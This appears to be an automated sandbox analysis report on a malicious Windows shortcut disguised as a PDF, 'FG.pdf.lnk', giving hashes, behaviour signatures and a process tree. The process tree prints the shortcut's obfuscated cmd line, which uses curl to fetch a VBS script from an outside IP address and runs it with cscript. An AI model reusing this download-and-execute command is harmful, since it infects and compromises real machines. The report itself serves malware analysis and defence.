Analysis
-
max time kernel
263s -
max time network
318s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 14:08
Static task
static1
Behavioral task
behavioral1
Sample
FG.pdf.lnk
Resource
win7-20230831-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
FG.pdf.lnk
Resource
win10v2004-20230915-en
4 signatures
150 seconds
General
-
Target
FG.pdf.lnk
-
Size
2KB
-
MD5
7726e0d4ce453fc9542d1356e9c18e0e
-
SHA1
13b8393a434d1f6dfe3224644dadd7be9bdf1a1e
-
SHA256
9ad5bb0943d324d197caafe209dff379d5882caafe1628cf8779e5c58f8bb87b
-
SHA512
4a001bf8cc31ebe8d8605d621bdecdcaf01ade51723a4698ba4ebfc1f92714b45116ed903e92f8624ec299bc92f8320d164853526e626a4ff0fffc4484f41858
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2720 PING.EXE 2872 PING.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2012 wrote to memory of 2488 2012 cmd.exe 28 PID 2012 wrote to memory of 2488 2012 cmd.exe 28 PID 2012 wrote to memory of 2488 2012 cmd.exe 28 PID 2488 wrote to memory of 2720 2488 cmd.exe 29 PID 2488 wrote to memory of 2720 2488 cmd.exe 29 PID 2488 wrote to memory of 2720 2488 cmd.exe 29 PID 2488 wrote to memory of 2872 2488 cmd.exe 30 PID 2488 wrote to memory of 2872 2488 cmd.exe 30 PID 2488 wrote to memory of 2872 2488 cmd.exe 30 PID 2488 wrote to memory of 2876 2488 cmd.exe 31 PID 2488 wrote to memory of 2876 2488 cmd.exe 31 PID 2488 wrote to memory of 2876 2488 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\FG.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c v49M || eCHo v49M & p"i"ng v49M || cu"R"l h"t"t"p":/"/"4"5."3"2"."222"."25"3/ym"t"p"R"/Yl -o C:\Users\Admin\AppData\Local\Temp\v49M.vbs & p"i"ng -n 3 v49M || c"scri"pT C:\Users\Admin\AppData\Local\Temp\v49M.vbs & e"x"It 'lHqqYhMrcXR2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\PING.EXEp"i"ng v49M3⤵
- Runs ping.exe
PID:2720
-
-
C:\Windows\system32\PING.EXEp"i"ng -n 3 v49M3⤵
- Runs ping.exe
PID:2872
-
-
C:\Windows\system32\cscript.exec"scri"pT C:\Users\Admin\AppData\Local\Temp\v49M.vbs3⤵PID:2876
-
-